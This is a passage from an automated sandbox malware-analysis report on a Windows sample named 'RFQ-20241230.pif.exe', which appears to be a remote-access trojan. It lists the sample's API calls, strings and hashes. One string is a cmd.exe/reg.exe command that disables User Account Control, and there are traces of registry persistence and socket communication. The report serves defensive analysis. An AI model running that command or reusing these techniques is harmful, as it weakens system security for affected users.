                            • Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                            Function 0041CA2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                            • GetLastError.KERNEL32 ref: 0041CAA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ClassCreateErrorLastRegisterWindow
                            • String ID: 0$MsgWindowClass
                            • API String ID: 2877667751-2410386613
                            • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                            • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                            • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                            • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                            Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                            • CloseHandle.KERNEL32(?), ref: 00406A14
                            Strings
                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CreateProcess
                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                            • API String ID: 2922976086-4183131282
                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                            • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                            • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                            Function 004425E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002), ref: 00442609
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000), ref: 0044263F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                            • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                            • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                            Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: pth_unenc$BG
                            • API String ID: 1818849710-2233081382
                            • Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                            • Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                            Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                            • String ID: KeepAlive | Disabled
                            • API String ID: 2993684571-305739064
                            • Opcode ID: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                            • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                            • Opcode Fuzzy Hash: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                            • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                            Function 00419F42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                            • Sleep.KERNEL32(00002710), ref: 00419F89
                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: PlaySound$HandleLocalModuleSleepTime
                            • String ID: Alarm triggered
                            • API String ID: 614609389-2816303416
                            • Opcode ID: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                            • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                            • Opcode Fuzzy Hash: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                            • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                            Function 0041BE7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                            Download Yara Rule
                            APIs
                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                            Strings
                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                            • API String ID: 3024135584-2418719853
                            • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                            • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                            Function 0044017A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                            • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                            • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                            • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                            Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                            • String ID:
                            • API String ID: 3525466593-0
                            • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                            • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                            • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                            • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                            Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                              • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                            • String ID:
                            • API String ID: 4269425633-0
                            • Opcode ID: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                            • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                            • Opcode Fuzzy Hash: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                            • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                            Function 004430A8 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                            • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                            • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                            Function 0044FEE3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3FD,?,00000000,?,00000001,?,?,00000001,0043E3FD,?), ref: 0044FF30
                            • __alloca_probe_16.LIBCMT ref: 0044FF68
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFB9
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399CF,?), ref: 0044FFCB
                            • __freea.LIBCMT ref: 0044FFD4
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                            • String ID:
                            • API String ID: 313313983-0
                            • Opcode ID: e5c5c8948a56a23b630a502c5eb8adb4e32c2096ed66fc33659528e3aa194df3
                            • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                            • Opcode Fuzzy Hash: e5c5c8948a56a23b630a502c5eb8adb4e32c2096ed66fc33659528e3aa194df3
                            • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                            Function 0044E14B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                            • _free.LIBCMT ref: 0044E1B0
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: cbfa98b2cae8c11c90072c2e77890abdc970385a4e1e7188d4ee333dffee03c0
                            • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                            • Opcode Fuzzy Hash: cbfa98b2cae8c11c90072c2e77890abdc970385a4e1e7188d4ee333dffee03c0
                            • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                            Function 00446F53 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00434413,00434413,?,00445369,00446B52,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?), ref: 00446F58
                            • _free.LIBCMT ref: 00446F8D
                            • _free.LIBCMT ref: 00446FB4
                            • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FC1
                            • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FCA
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                            • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                            • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                            • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                            Function 0044F7AD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 0044F7C5
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 0044F7D7
                            • _free.LIBCMT ref: 0044F7E9
                            • _free.LIBCMT ref: 0044F7FB
                            • _free.LIBCMT ref: 0044F80D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                            • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                            • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                            Function 004432F7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 00443315
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 00443327
                            • _free.LIBCMT ref: 0044333A
                            • _free.LIBCMT ref: 0044334B
                            • _free.LIBCMT ref: 0044335C
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                            • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                            • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                            Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                            • IsWindowVisible.USER32(?), ref: 004167A1
                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessWindow$Open$TextThreadVisible
                            • String ID: (FG
                            • API String ID: 3142014140-2273637114
                            • Opcode ID: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                            • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                            • Opcode Fuzzy Hash: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                            • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                            Function 0044D469 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                            Download Yara Rule
                            APIs
                            • _strpbrk.LIBCMT ref: 0044D4B8
                            • _free.LIBCMT ref: 0044D5D5
                              • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,00434413,?,?,?,00434413,00000016,?,?,0043A843,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                              • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417,?,00434413), ref: 0043A888
                              • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000,?,00434413), ref: 0043A88F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                            • String ID: *?$.
                            • API String ID: 2812119850-3972193922
                            • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                            • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                            • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                            • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                            Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                              • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                            • String ID: XCG$`AG$>G
                            • API String ID: 2334542088-2372832151
                            • Opcode ID: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                            • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                            • Opcode Fuzzy Hash: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                            • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                            Function 004426E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000104), ref: 00442724
                            • _free.LIBCMT ref: 004427EF
                            • _free.LIBCMT ref: 004427F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Users\user\Desktop\RFQ-20241230.pif.exe
                            • API String ID: 2506810119-905787867
                            • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                            • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
